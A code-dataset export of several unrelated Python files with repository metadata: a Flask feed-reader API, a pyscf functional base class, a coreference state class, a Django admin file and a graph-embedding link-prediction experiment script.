entry_id = data['entry-id']
get_reader().mark_entry_as_unread((feed_url, entry_id))
@form_api(really=True)
@readererror_to_apierror()
def mark_all_as_read(data):
feed_url = data['feed-url']
    entry_ids = json.loads(data['entry-id'])
    for entry_id in entry_ids:
        get_reader().mark_entry_as_read((feed_url, entry_id))
@form_api(really=True)
@readererror_to_apierror()
def mark_all_as_unread(data):
feed_url = data['feed-url']
    entry_ids = json.loads(data['entry-id'])
    for entry_id in entry_ids:
        get_reader().mark_entry_as_unread((feed_url, entry_id))
@form_api
@readererror_to_apierror()
def mark_as_important(data):
feed_url = data['feed-url']
entry_id = data['entry-id']
get_reader().mark_entry_as_important((feed_url, entry_id))
@form_api
@readererror_to_apierror()
def mark_as_unimportant(data):
feed_url = data['feed-url']
entry_id = data['entry-id']
get_reader().mark_entry_as_unimportant((feed_url, entry_id))
@form_api(really=True)
@readererror_to_apierror()
def delete_feed(data):
feed_url = data['feed-url']
get_reader().delete_feed(feed_url)
@form_api
@readererror_to_apierror()
def add_feed(data):
feed_url = data['feed-url'].strip()
assert feed_url, "feed-url cannot be empty"
# TODO: handle FeedExistsError
get_reader().add_feed(feed_url)
@form_api
@readererror_to_apierror()
def update_feed_title(data):
feed_url = data['feed-url']
feed_title = data['feed-title'].strip() or None
get_reader().set_feed_user_title(feed_url, feed_title)
@form_api
@readererror_to_apierror()
def add_metadata(data):
feed_url = data['feed-url']
key = data['key']
get_reader().set_feed_metadata_item(feed_url, key, None)
@form_api
@readererror_to_apierror()
def update_metadata(data):
feed_url = data['feed-url']
key = data['key']
try:
value = yaml.safe_load(data['value'])
except yaml.YAMLError as e:
raise APIError("invalid JSON: {}".format(e), (feed_url, key))
get_reader().set_feed_metadata_item(feed_url, key, value)
@form_api
@readererror_to_apierror()
def delete_metadata(data):
feed_url = data['feed-url']
key = data['key']
get_reader().delete_feed_metadata_item(feed_url, key)
@form_api
@readererror_to_apierror()
def update_feed_tags(data):
feed_url = data['feed-url']
feed_tags = set(data['feed-tags'].split())
reader = get_reader()
tags = set(reader.get_feed_tags(feed_url))
for tag in tags - feed_tags:
reader.remove_feed_tag(feed_url, tag)
for tag in feed_tags - tags:
reader.add_feed_tag(feed_url, tag)
@form_api(really=True)
@readererror_to_apierror()
def change_feed_url(data):
feed_url = data['feed-url']
new_feed_url = data['new-feed-url'].strip()
# TODO: when there's a way to validate URLs, use it
# https://github.com/lemon24/reader/issues/155#issuecomment-673694472
get_reader().change_feed_url(feed_url, new_feed_url)
@form_api
@readererror_to_apierror()
def enable_feed_updates(data):
feed_url = data['feed-url']
get_reader().enable_feed_updates(feed_url)
@form_api
@readererror_to_apierror()
def disable_feed_updates(data):
feed_url = data['feed-url']
get_reader().disable_feed_updates(feed_url)
@form_api
@readererror_to_apierror()
def update_feed(data):
# TODO: feed updates should happen in the background
# (otherwise we're tying up a worker);
# acceptable only because /preview does it as well
feed_url = data['feed-url']
get_reader().update_feed(feed_url)
# for some reason, @blueprint.app_template_global does not work
@blueprint.app_template_global()
def additional_enclosure_links(enclosure, entry):
funcs = getattr(current_app, 'reader_additional_enclosure_links', ())
for func in funcs:
yield from func(enclosure, entry)
def create_app(config):
app = Flask(__name__)
app.secret_key = 'secret'
app.config['READER_CONFIG'] = config
app.teardown_appcontext(close_db)
app.register_blueprint(blueprint)
# NOTE: this is part of the app extension API
app.reader_additional_enclosure_links = []
app.plugin_loader = loader = Loader()
def log_exception(message, cause):
app.logger.exception("%s; original traceback follows", message, exc_info=cause)
# Don't raise exceptions for plugins, just log.
# Does it make sense to keep going after initializing a plugin fails?
# How do we know the target isn't left in a bad state?
loader.handle_import_error = log_exception
loader.handle_init_error = log_exception
# Fail fast for reader plugin import/init errors
# (although depending on the handler they may just be logged).
with app.app_context():
get_reader()
loader.init(app, config.merged('app').get('plugins', {}))
return app
|
[
"yarramajith@gmail.com"
] |
yarramajith@gmail.com
|
d9a58437e924d5c26e735dd9567430f0c5d9125b
|
29333e514bb8e4bc18105175c8d7a0b63390c7ce
|
/cf.py
|
7d7ef0c10ed3e3f8fc1943a1bcc7e41d70dcef14
|
[] |
no_license
|
ElectronicStructureUdeM/scripts
|
39a836de7e2a4446a12ce480119ef0abd17afcdf
|
1320aebabc68d1c3fa804d5f07730573a2fe9197
|
refs/heads/master
| 2020-07-29T14:47:24.407050
| 2020-04-07T01:24:26
| 2020-04-07T01:24:26
| 209,847,285
| 1
| 1
| null | 2020-04-07T01:24:27
| 2019-09-20T17:37:17
|
Python
|
UTF-8
|
Python
| false
| false
| 1,672
|
py
|
from pyscf import dft,lib,scf
import numpy as np
import kernel
class CF():
def __init__(self, mol, kskernel):
        # Integration grid: Gauss-Legendre nodes/weights on [-1, 1], mapped to
        # [min_y, max_y] by an affine change of variables (weights rescaled by
        # the Jacobian (max_y - min_y) / 2).
        self.min_y = 0.0
        self.max_y = 100.0
        self.gauleg_deg = 2000
        self.y_grid, self.y_weights = np.polynomial.legendre.leggauss(self.gauleg_deg)
        self.y_values = 0.5 * (self.y_grid + 1) * (self.max_y - self.min_y) + self.min_y
        self.y_weights = self.y_weights * 0.5 * (self.max_y - self.min_y)
        # Cache small integer powers of the mapped nodes for reuse.
        self.y_values_power = {1: self.y_values, 2: self.y_values**2, 3: self.y_values**3,
                               4: self.y_values**4, 5: self.y_values**5, 6: self.y_values**6}
    # Template methods; concrete functionals must override these.
    def CalculateMomentJXE(self, n, JX, E):
        raise NotImplementedError('Subclass specialization')

    def CalculateA(self, rs, zeta):
        raise NotImplementedError('Subclass specialization')

    def CalculateB(self, rs, zeta):
        raise NotImplementedError('Subclass specialization')

    def CalculateC(self, JX, A, B, E):
        raise NotImplementedError('Subclass specialization')

    def SolveE(self, E, rho, kf, epsilonXC, JX, A, B):
        raise NotImplementedError('Subclass specialization')

    def CalculateE(self, rho, kf, epsilonXC, JX, A, B):
        raise NotImplementedError('Subclass specialization')

    def CalculateCD(self, rho, kf, eps_xc, JX, A, B, E):
        raise NotImplementedError('Subclass specialization')

    def CalculateTotalXC(self, params_up=None, params_down=None):
        raise NotImplementedError('Subclass specialization')
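# A quick sanity-check sketch (an illustrative addition, not part of the
# original class): with the same affine map used in CF.__init__, integrating
# exp(-y) over [0, 100] should come out as ~1.0.
def _quadrature_sanity_check(deg=2000, a=0.0, b=100.0):
    y, w = np.polynomial.legendre.leggauss(deg)
    y = 0.5 * (y + 1) * (b - a) + a
    w = w * 0.5 * (b - a)
    return np.sum(w * np.exp(-y))  # expected ~= 1.0 (exact value: 1 - e**-100)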
|
[
"rodrigobogossian@gmail.com"
] |
rodrigobogossian@gmail.com
|
b6d65b733fa93e683f912e595de20b6d50ba81bc
|
d02727d818c369e4ad13489788458b2a19a593f1
|
/models/searn/state.py
|
ff62372ceb07bc18254584b842df9c06b2c608e9
|
[] |
no_license
|
artemkramov/coreference-pairs
|
cbe299b6d71ebc945abaaa4fbbb4196b6145ebe2
|
8fab8e13b039cf0ccd68dcab6b394dd71d555ff9
|
refs/heads/master
| 2021-06-26T06:42:04.631865
| 2019-08-16T14:18:50
| 2019-08-16T14:18:50
| 174,178,363
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,463
|
py
|
from .mention import Mention
import uuid
from typing import List
from .action import MergeAction, PassAction, Action
from .policy import Policy
import copy
# State of mentions
class State:
# Index of the current mention in the list of mentions
current_mention_idx = 1
# Index of the current antecedent in the list of mentions
current_antecedent_idx = 0
clusters = []
def __init__(self, _clusters):
self.clusters = _clusters
def get_cluster_id(self, mention_id):
return self.clusters[mention_id]
# Get cluster with mentions where the given mention is located
def get_cluster_by_id(self, mention_cluster_id: str, mentions: List[Mention]) -> List[Mention]:
if mention_cluster_id is None:
return []
cluster = []
for idx, cluster_id in enumerate(self.clusters):
if cluster_id == mention_cluster_id:
cluster.append(mentions[idx])
return cluster
def get_siblings_of_mention(self, mention_id):
cluster = []
mention_cluster_id = self.get_cluster_id(mention_id)
for idx, cluster_id in enumerate(self.clusters):
if cluster_id == mention_cluster_id:
cluster.append(idx)
return cluster
def get_cluster_of_mention(self, mention_id, mentions):
mention_cluster_id = self.get_cluster_id(mention_id)
return self.get_cluster_by_id(mention_cluster_id, mentions)
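# Usage sketch (hypothetical data): clusters[i] holds the cluster id of
# mention i, so siblings are simply all indices sharing that id.
#
#   state = State(['c0', 'c0', 'c1'])
#   state.get_cluster_id(2)           # -> 'c1'
#   state.get_siblings_of_mention(0)  # -> [0, 1]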
|
[
"github@help-micro.com.ua"
] |
github@help-micro.com.ua
|
ad90ac3c023bc1b2ebd8f09634fcd8803d5f884b
|
438d6a867e23e49fe84041d1dcb3456b71af8ebb
|
/Modulos/inventario/admin.py
|
0d4c470169a2b07ef45fe28d9c943d06b7366daf
|
[] |
no_license
|
Nicko1722/inventario-is
|
76d0108ecd2e01843c60292d80f6c27c39f53faa
|
b7ed35de235673ad896ffdcefcf6d6c9c08501c5
|
refs/heads/master
| 2021-01-01T03:56:34.485005
| 2016-04-24T21:35:07
| 2016-04-24T21:35:07
| 56,994,494
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 483
|
py
|
from django.contrib import admin
from .models import Producto, Provedor, Categoria
# Register your models here.
@admin.register(Categoria)
class CategoriaAdmin(admin.ModelAdmin):
list_display = ['id', 'nombre']
@admin.register(Provedor)
class ProvedorAdmin(admin.ModelAdmin):
list_display = ['id', 'nombre']
@admin.register(Producto)
class ProductoAdmin(admin.ModelAdmin):
list_display = ['id', 'nombre', 'categoria',
'provedor', 'unidades']
|
[
"ioswxd@gmail.com"
] |
ioswxd@gmail.com
|
398f6493189033c8b14eac236ef7b803d54b45f7
|
a882da51d61cd6ab92581d178b7b97726f3381a8
|
/ppl/apps/mdb/mdb_macros/css/__init__.py
|
b36792bba276c9a4076f35650622034fdbc85676
|
[] |
no_license
|
sheldonGal/ppl-polls-project
|
52733ab76b29404e3beef39b2f6159ba0f6a45f3
|
9078fdee96c5852ede8b25ac28c9b8ec1ef98294
|
refs/heads/master
| 2020-05-19T10:14:21.570023
| 2019-05-13T15:53:02
| 2019-05-13T15:53:02
| 184,966,882
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 34
|
py
|
from .text_color import text_color
|
[
"sheldon.gal.nb@gmail.com"
] |
sheldon.gal.nb@gmail.com
|
ec185ea92c21539da1a1068e7e43354f7fe4e2de
|
17d30f314ba07706c473ced6f1ed48b5c5b74cd5
|
/link_prediction/main_tmp.py
|
bc6daf19fbe5849aab58e508513e606b90cd7a34
|
[] |
no_license
|
galkampel/Link_prediction
|
e0c924cc41fa6f34de42d8b35632340e67b7c11a
|
6f6a4316c4eb8bb276205d8bee78b78f6a4f8b79
|
refs/heads/master
| 2020-06-28T22:57:29.225756
| 2019-08-03T21:22:24
| 2019-08-03T21:22:24
| 200,364,076
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,398
|
py
|
# import networkx as nx
from graph import Graph
from preprocess import Preprocess
# from node2vec import Node2vec
from walker import DeepWalker #,expand_node
from nodeEmbeddings import *
from model import Model
from edge2vec import *
from splitter import Splitter
from community import CommunityNetwork #,get_graph_stats
from file2obj import save_to_gzip,read_gzip_object,convert_file2obj,save_str,save_res_to_csv #,save_vec_to_HDF5,read_vec_from_HDF5,save_to_csv,read_csv_params
from time import time
from itertools import chain#,product
# from multiprocessing import cpu_count
# import matplotlib.pyplot as plt
import gc
gc.collect()
def create_dateset(data_name,files_name,CD_model,has_communities=True,is_synthetic=False):
#'input_community.json'
if is_synthetic:
params = convert_file2obj('input_syn_community.json')
community_graph = CommunityNetwork(min_num_edges=8)
community_graph.lfr_stats(params)
community_graph.create_lfr(has_communities,params["N"],params["alpha"],params["beta"],params["mu"],params["k_min"],
params["k_max"], params["c_min"],params["c_max"],params["seed"],CD_model)
community_graph.create_between_edges_dict(verbose=True)
save_str(community_graph.get_log(),'graphs/{}_{}_stats.txt'.format(data_name,CD_model))
save_to_gzip(community_graph.get_G(),'{}_{}_{}.gz'.format(data_name,CD_model,files_name[0]))
save_to_gzip(community_graph.get_between_edges_dict(),'{}_{}_{}.gz'.format(data_name,CD_model,files_name[2]))
community_dict = community_graph.get_community_dict()
if has_communities:
save_to_gzip(community_dict,'{}_{}_{}.gz'.format(data_name,CD_model,files_name[1]))
else:
print("new community dict was saved")
save_to_gzip(community_graph.get_communities_n2v_dict(),'{}_{}_{}.gz'.format(data_name,CD_model,files_name[1]))
            print('new community dict:\n{}'.format(community_graph.get_communities_n2v_dict()))
return community_dict
#real data
else:
params = convert_file2obj('input_real_community.json')
community_graph = CommunityNetwork(min_num_edges=6)
community_graph.get_real_data(params['edgelist_file'],params['groups_file'],has_communities,CD_model)
community_graph.create_between_edges_dict()
save_str(community_graph.get_log(),'graphs/{}_{}_stats.txt'.format(data_name,CD_model))
save_to_gzip(community_graph.get_G(),'{}_{}_{}.gz'.format(data_name,CD_model,files_name[0]))
save_to_gzip(community_graph.get_between_edges_dict(),'{}_{}_{}.gz'.format(data_name,CD_model,files_name[2]))
community_dict = community_graph.get_community_dict()
        print('community dict has {} keys and {} values'.format(len(community_dict.keys()), sum(
            len(val) for val in community_dict.values())))
if has_communities:
save_to_gzip(community_dict,'{}_{}_{}.gz'.format(data_name,CD_model,files_name[1]))
else:
print("new community dict was saved")
save_to_gzip(community_graph.get_communities_n2v_dict(),'{}_{}_{}.gz'.format(data_name,CD_model,files_name[1]))
            print('new community dict:\n{}'.format(community_graph.get_communities_n2v_dict()))
return
#create 'a given' graph to predict from
def preprocess_G(data_name,files_name,CD_model,has_communities,community_dict,multiplier,seed = 1,frac_within=0.5,frac_between=0.5):
G = read_gzip_object('{}_{}_{}.gz'.format(data_name,CD_model,files_name[0]))
# community_dict = read_gzip_object('{}_{}_{}.gz'.format(data_name,CD_model,files_name[1]))
between_edges_dict = read_gzip_object('{}_{}_{}.gz'.format(data_name,CD_model,files_name[2]))
print('Start preprocessing...')
#default seed = 1
preprocess = Preprocess(G,community_dict,between_edges_dict,multiplier,frac_within,frac_between,seed = seed)
start = time()
preprocess.set_new_G('{}_{}_{}_{}_{}'.format(data_name,CD_model,int(has_communities),seed,files_name[4]))
print('It took {:.3f} seconds to create new G and test set'.format(time()-start))
start = time()
preprocess.save_train_obj('{}_{}_{}_{}_{}'.format(data_name,CD_model,int(has_communities),seed,files_name[3]))
print('It took {:.3f} seconds to create new training set'.format(time()-start))
save_to_gzip(preprocess.get_G(),'{}_{}_{}_{}_{}.gz'.format(data_name,CD_model,int(has_communities),seed,files_name[0]))
# def partition_community_dict(community_dict,G,data_name,CD_model,seed,thres=10000,to_save=True):
#
# df = pd.DataFrame.from_dict({key:get_graph_stats(G.subgraph(nodes),count_communities=False) for key,nodes in community_dict.items()},
# orient='index',columns = ['nodes','edges','avg degree','r_avg degree','med degree'])
# is_outlier = (((df['r_avg degree'] - df['r_avg degree'].mean()).abs() > 2 * df['r_avg degree'].std())
# & ((df['r_avg degree'] - df['r_avg degree'].mean()).abs() > 2 * df['r_avg degree'].std()))
# c_outlies = df[is_outlier].index.tolist()
# rel_df = df[~is_outlier]
# k_rounded_meds = tuple(rel_df.groupby(['r_avg degree', 'med degree']).groups.keys())
# c_to_parj = {}
# num_edges = 0
# N = len(k_rounded_meds)
# j = 0
# for i,k_rounded_med in enumerate(k_rounded_meds):
# k_rounded,k_med = k_rounded_med
# tmp_df = df[(df['r_avg degree'] == k_rounded) & (df['med degree'] == k_med) ]
# for c in tmp_df.index.tolist():
# c_to_parj[c] = j
#
# num_edges += tmp_df['edges'].sum()
# if num_edges > thres or i == N-1:
# j += 1
# num_edges = 0
#
# for c in c_outlies:
# c_to_parj[c] = j
# j += 1
#
# if to_save:
# df.to_csv("df_{}_{}_{}.csv".format(data_name,CD_model,seed))
# save_to_gzip(c_to_parj,'community_to_partition_{}_{}_{}.gz'.format(data_name,CD_model,seed))
#
# return c_to_parj,j+1
# def node2embeddings(params,data_name,files_name,CD_model,has_communities,community_dict,multiplier,seed):
# # community_dict = read_gzip_object('{}_{}_{}.gz'.format(data_name,CD_model,files_name[1]))
# print('Node2vec phase (graph-wise)')
# graph = Graph()
# graph.read_edgelist('{}_{}_{}_{}_{}.gz'.format(data_name,CD_model,int(has_communities),seed,files_name[0]))
# start = time()
# node2vec = Node2vec(graph.G,params,community_dict,multiplier,size=params["d"],window=params["k"],
# workers=cpu_count())
# print('It took {:.3f} seconds to create nodes representations'.format(time()-start))
# # save_to_gzip(node2vec.get_node2vec(),'{}_{}_{}_{}_{}_{}_{}.gz'.format(data_name,params_str,CD_model,int(has_communities),
# return node2vec.get_node2vec()
# def node2embeddings_community(community_dict,G,params,multiplier,to_expand):#,to_max = False): #is_community_level=False
# #create a community-level node2vec, and then merge all node2vecs to a single dictionary
# # graph = Graph()
# # graph.read_edgelist('{}_{}_{}_{}_{}.gz'.format(data_name,CD_model,int(has_communities),seed,files_name[0]))
# start = time()
# d,k = params["d"],params["k"]
# node2vec = Node2vec(G,params,community_dict,multiplier,is_community_level = True,
# to_expand=to_expand, size=d,window=k,workers=cpu_count())
# print('It took {:.3f} seconds to create nodes representations'.format(time()-start))
# return node2vec.get_node2vec()
# def edge2community_edge(data,is_within):
# if is_within:
# within_pos_edges = list((expand_node(link[0],c),expand_node(link[1],c) )
# for c,links in data['pos']['within'].items() for link in links)
# within_neg_edges = list((expand_node(link[0],c),expand_node(link[1],c) )
# for c,links in data['neg']['within'].items() for link in links)
# return within_pos_edges,within_neg_edges
# else:
# between_pos_edges = list((expand_node(link[0],c1),expand_node(link[1],c2) )
# for (c1,c2),links in data['pos']['between'].items() for link in links)
# between_neg_edges = list((expand_node(link[0],c1),expand_node(link[1],c2) )
# for (c1,c2),links in data['neg']['between'].items() for link in links)
# return between_pos_edges,between_neg_edges
def create_train_test(model,data_obj,bin_op,dim): #,is_community_level = False,to_expand = False
# if is_community_level and to_expand:
# within_pos_edges,within_neg_edges = edge2community_edge(data_obj,is_within=True)
# between_pos_edges,between_neg_edges = edge2community_edge(data_obj,is_within=False)
# data_within_pos = model.edge2vec(within_pos_edges,bin_op,dim,True)
# data_within_neg = model.edge2vec(within_neg_edges,bin_op,dim,False)
# data_within = merge_edges(data_within_pos,data_within_neg)
# data_between_pos = model.edge2vec(between_pos_edges,bin_op,dim,True)
# data_between_neg = model.edge2vec(between_neg_edges,bin_op,dim,False)
# data_between = merge_edges(data_between_pos,data_between_neg)
# return data_within,data_between
# else:
data_within_pos = model.edge2vec(list(chain(*data_obj['pos']['within'].values())),bin_op,dim,True)
data_within_neg = model.edge2vec(list(chain(*data_obj['neg']['within'].values())),bin_op,dim,False)
data_within = {'pos':data_within_pos,'neg': data_within_neg}
data_between_pos = model.edge2vec(list(chain(*data_obj['pos']['between'].values())),bin_op,dim,True)
data_between_neg = model.edge2vec(list(chain(*data_obj['neg']['between'].values())),bin_op,dim,False)
data_between = {'pos':data_between_pos,'neg': data_between_neg}
return data_within,data_between
#create 2 datasets: one for within edges, and the other for between edges
#using Hadamard because it was the best binary operator according to the article
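# "Hadamard" here is presumably the elementwise product of the two endpoint
# embeddings, as in the node2vec paper's binary operators (illustrative):
#
#   edge_vec(u, v) = n2v[u] * n2v[v]   # elementwise, keeps dimension d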
def nodes2edge(vectors,files_name,CD_model,data_name,seed,
has_communities,to_diff_links): #params_str, to_expand=False
    train_obj = read_gzip_object('{}_{}_{}_{}_{}.gz'.format(data_name, CD_model, int(has_communities), seed, files_name[3]))
test_obj = read_gzip_object('{}_{}_{}_{}_{}.gz'.format(data_name,CD_model,int(has_communities),seed,files_name[4]))
# vectors = read_gzip_object('{}_{}_{}_{}_{}_{}_{}.gz'.format(data_name,params_str,CD_model,int(has_communities),
# int(is_community_level),seed,files_name[-2]))
print("start converting nodes to edges")
d = list(vectors.values())[0].shape[0]
model = Edge2vec(vectors)
start = time()
train_within,train_between = create_train_test(model,train_obj,Hadamard,d)
test_within,test_between = create_train_test(model,test_obj,Hadamard,d)
    print('It took {:.3f} seconds to create edge embeddings'.format(time() - start))
train = {'within': train_within, 'between': train_between}
test = {'within': test_within, 'between': test_between}
# save 4 datasets (within/between for train/test)
if to_diff_links:
#create a link embeddings using a classifier and saving sate dictionary of the embeddings network
splitter = Splitter()
splitter.set_within_between_sep(train_within['pos'],train_between['pos'])
return train,test
def link_prediction(model_name,to_diff_links,is_multiclass,seed,
train_dict,test_dict,model_params_path ,params_str,output):
model_params = convert_file2obj(model_params_path)
model = Model(model_params,to_diff_links,is_multiclass,seed)
if model_name == 'Logistic Regression' or model_name == 'xgboost':
model.get_measures(train_dict,test_dict,output,model_name,params_str)
else:
model.get_MLP_measures(train_dict,test_dict,output,params_str)
#has_communities:
# if 0 then need to use community detection algorithm to create communities
#CD_model:
# 0 if no need of CD algorithm, 1 for multilevel, 2 for infomap and 3 for label propagation
#is_community_level:
# 1 if community-level based node2vec should be created else (0) graph-level
# two types of prediction:
# type '1' - ignore community knowledge
# type '2' - differentiate between within and between community links
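# Illustrative input_params.json consumed by __main__ below (field names are
# taken from the code that reads it; the values shown are hypothetical):
#
#   {
#       "data_name": "Flickr",
#       "has_communities": 1,
#       "CD_model": 1,
#       "to_diff_links": 1,
#       "is_multiclass": 0,
#       "model_params_path": "model_params.json",
#       "method": "ELMo",
#       "model_name": "xgboost",
#       "seed": 1,
#       "seed_trainings": [1, 2, 3],
#       "is_synthetic": 0,
#       "has_community_dict": 1
#   }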
# def exe_n2v(files_name,num_to_save,data_name,CD_model,model_name,to_diff_links,is_multiclass,
# has_communities, multiplier,seed,seed_trainings,all_params,model_params_path=None):
#
# # all_params = convert_file2obj('all_params_tmp.json')
# all_params["workers"] = cpu_count()
# output = []
# header = ["p","q","d","r","l","k","F1 within","AP within","Accuracy within","AUC within","F1 between","AP between",
# "Accuracy between","AUC between","F1 total","AP total","Accuracy total","AUC total","params"]
# output.append(header)
# counter = 1
# pqs, d, r, ls, ks = list(all_params.values())[:5]
# to_read_n2v_dict = all_params["to_read_n2v_dict"]
# to_save_n2v_dict = all_params["to_save_n2v_dict"]
# all_combinations = [(pq[0],pq[1],d,r,l,k) for pq in pqs for l in ls for k in ks if l > k]
# community_dict = read_gzip_object('{}_{}_{}.gz'.format(data_name, CD_model, files_name[1]))
# community_dict = {c:[str(u) for u in nodes] for c,nodes in community_dict.items()}
# for seed_training in seed_trainings:
# for cand_param in all_combinations:
# p,q,d,r,l,k = cand_param
# params = {"p": p,"q": q, "d":d,"r":r,"l":l,"k":k,"workers":all_params["workers"]}
# n2v_params = list(params.values())[:-1]
# print("Node2vec parameters: {}".format(params))
# params_str = "_".join("{}={}".format(key,val) for key,val in params.items() if key !='workers')
# n2v_dict = None
# if to_read_n2v_dict:
# n2v_dict = read_gzip_object('n2v_dict_{}_{}_{}_{}.gz'.format(data_name,params_str,int(has_communities),seed))
# else:
# n2v_dict = node2embeddings(params,data_name,files_name,CD_model,has_communities,community_dict,multiplier,seed)
# if to_save_n2v_dict:
# save_to_gzip(n2v_dict,'n2v_dict_{}_{}_{}_{}.gz'.format(data_name,params_str,int(has_communities),seed))
# print('finished creating node2vec')
#
#
# train_dict,test_dict = nodes2edge(n2v_dict,files_name,CD_model,data_name,seed,has_communities)
# link_prediction(model_name,to_diff_links,is_multiclass,seed_training,
# train_dict,test_dict,model_params_path,n2v_params,output)
# if counter % num_to_save == 0:
# save_res_to_csv(int(counter / num_to_save),data_name,CD_model,has_communities,
# to_diff_links,is_multiclass,seed,seed_training,model_name,output)
# output = []
# output.append(header)
# counter += 1
# if len(output) > 1:
# if counter % num_to_save == 0:
# counter = int(counter / num_to_save)
# else:
# counter = int(counter / num_to_save) + 1
# save_res_to_csv(counter,data_name,CD_model,has_communities,to_diff_links,
# is_multiclass,seed,seed_training,model_name,output)
# counter = 1
# output = []
# output.append(header)
# return
def config_to_str(config):
    # Render a config sequence as "(a,b,c)" for use in parameter strings.
    return "(" + ",".join("{}".format(c) for c in config) + ")"
def exe(files_name,method,num_to_save,data_name,CD_model,model_name,to_diff_links,is_multiclass,
has_communities, multiplier,seed,seed_trainings,n2embedd_params,model_params_path=None):
output = []
header = ["Method","Method_params","F1 within", "AP within", "Accuracy within",
"AUC within", "F1 between","AP between","Accuracy between", "AUC between",
"F1 total", "AP total","Accuracy total", "AUC total", "params"]
# to_read_embed_dict = all_params["to_read_embed_dict"]
to_save_embed_dict = False #n2embedd_params["to_save_embed_dict"]
output.append(header)
community_dict = read_gzip_object('{}_{}_{}.gz'.format(data_name, CD_model, files_name[1]))
community_dict = {c: [str(u) for u in nodes] for c, nodes in community_dict.items()}
graph = Graph()
graph.read_edgelist('{}_{}_{}_{}_{}.gz'.format(data_name, CD_model, int(has_communities), seed, files_name[0]))
#which node2embedding to execute
node_embeddings = None
counter = 1
config_name,configs = None,None
if method == "ELMo":
configs = n2embedd_params["scalar_mix_parameters"]
config_name = "scalar_mix_parameters"
if to_save_embed_dict:
set_sentences_node2idx(graph.G,n2embedd_params,seed)
node_embeddings = get_ElmoEmbeddings
    elif method == "ComE":
        # TODO: ComE embeddings not implemented yet
        pass
    else:
        # TODO: M-NMF embeddings not implemented yet
        pass
for seed_training in seed_trainings:
for config in configs:
params_str = "_".join( "{}={}".format(key, val) for key, val in n2embedd_params.items()
if key != config_name and key != "sentences" and key != "nodes2idx")
            params_str += "_{}={}".format(config_name, config_to_str(config))
pre_measures = [method,params_str]
vectors = None
if to_save_embed_dict:
start = time()
vectors = node_embeddings(graph.G,n2embedd_params,config)
print('it took {:.3f} seconds to create node embeddings dict'.format(time()-start))
save_to_gzip(vectors,'vectors_{}.gz'.format(params_str))
                print('saved nodes representation dict\nContinue..')
continue
else: #to read dict
vectors = read_gzip_object('vectors_{}.gz'.format(params_str))
train_dict, test_dict = nodes2edge(vectors, files_name, CD_model, data_name, seed, has_communities,to_diff_links)
link_prediction(model_name, to_diff_links, is_multiclass, seed_training,
train_dict, test_dict, model_params_path, pre_measures, output)
if counter % num_to_save == 0:
save_res_to_csv(int(counter / num_to_save), data_name, CD_model, has_communities,
to_diff_links, is_multiclass, seed, seed_training, model_name, output)
output = []
output.append(header)
counter += 1
if to_save_embed_dict:
print('finished looping over configs.\nStop execution')
exit()
if len(output) > 1:
if counter % num_to_save == 0:
counter = int(counter / num_to_save)
else:
counter = int(counter / num_to_save) + 1
save_res_to_csv(counter, data_name, CD_model, has_communities, to_diff_links,
is_multiclass, seed, seed_training, model_name, output)
counter = 1
output = []
output.append(header)
def set_sentences_node2idx(G,params,seed):
walker = DeepWalker(G)
start = time()
walker.preprocess_transition_probs()
print('it took {:.3f} seconds to create transition probs'.format(time()-start))
sentences, nodes2idx = walker.simulate_walks(params["num_walks"],params["walk_length"])
params["sentences"] = sentences
params["nodes2idx"] = nodes2idx
def get_ElmoEmbeddings(G,params,scalar_mix_parameters):
elmo = ElmoEmbeddings(scalar_mix_parameters,params["num_output_representations"],params["dropout"],
params["requires_grad"])
elmo.set_ELMO_embeddings(params["sentences"])
print('finished creating embeddings')
return elmo.get_vectors(params["nodes2idx"])
# def get_all_params(best_all_params):
# d = {}
# for params in best_all_params.values():
# for param,val in params.items():
# d.setdefault(param,[]).append(val)
# return list(d.values())
# def set_directed_G(G):
# G = G.to_directed()
# nx.set_edge_attributes(G,values=1,name='weight')
# G = nx.relabel_nodes(G, lambda x: str(x))
# return G
#
# def get_r_d_k_rho(best_all_params):
# params = list(best_all_params.values())[0]
# return params["r"],params["d"],params["k"],params["rho"]
#
# def plot_rhos(rhos,val_rhos,params_str):
# plt.xlabel("rho")
# plt.xlim(0,1)
# plt.xticks(np.arange(0.0, 1.1, step=0.1))
# plt.ylabel("accuracy")
# plt.title("validation accuracy with different rhos")
# plt.plot(rhos,val_rhos)
# plt.savefig('plots_rho/{}.png'.format(params_str))
# plt.close()
## l > k , p <= q
#d = 128, r = 10, l = 80, k = 10
# d = 64,128 p,q= 0.25,0.5,1,2 r = 10,12,14 l= 10,30,50,80 k = 10,12,14,16
if __name__ == '__main__':
input_params = convert_file2obj('input_params.json')
data_name =input_params["data_name"]
has_communities = input_params["has_communities"]
CD_model = input_params["CD_model"]
multiplier = 1
if data_name == "Flickr":
multiplier = 5
if has_communities:
CD_model = 0
all_params = None
# to_expand = None
# to_intertwine = None
to_diff_links = input_params["to_diff_links"]
is_multiclass = input_params["is_multiclass"]
model_params_path = input_params["model_params_path"]
method = input_params["method"]
all_params = convert_file2obj('{}_params.json'.format(method))
model_params = convert_file2obj(model_params_path)
model_name = input_params["model_name"]
seed = input_params["seed"]
seed_trainings = input_params["seed_trainings"]
is_synthetic = input_params["is_synthetic"]
has_community_dict = input_params["has_community_dict"]
files_name = ['graph','community_dict','between_dict','train','test','embeddings','log']
# if not has_community_dict:
# create_dateset(data_name,files_name,CD_model,has_communities=has_communities,is_synthetic=is_synthetic)
# exit()
# else:
# community_dict = read_gzip_object('{}_{}_{}.gz'.format(data_name, CD_model, files_name[1]))
# preprocess_G(data_name,files_name,CD_model,has_communities,community_dict,multiplier,seed,frac_within=0.5,frac_between=0.5)
# print('Finish preprocessing.\nQuit execution!!')
# exit()
num_to_save = 1
counter = 1
    output = None
exe(files_name,method,num_to_save,data_name,CD_model,model_name,to_diff_links,is_multiclass,
has_communities,multiplier,seed,seed_trainings,all_params,model_params_path)
|
[
"noreply@github.com"
] |
galkampel.noreply@github.com
|
aaa0a6007ed8d3e408f2f48673605bab85e04bdf
|
fd6976d9773fc56f5af47fbd1f9d366feffc777f
|
/apscheduler/serializers/json.py
|
7c2513bba0a7fa1681b8b67ad676fca413342254
|
[
"MIT"
] |
permissive
|
daya0576/apscheduler
|
f4678077ddf9b2cb7f72d6c8b82178b34547b21a
|
61b8b44c712c9a28e613044b12c553adbc6ca015
|
refs/heads/master
| 2023-05-31T19:57:46.824631
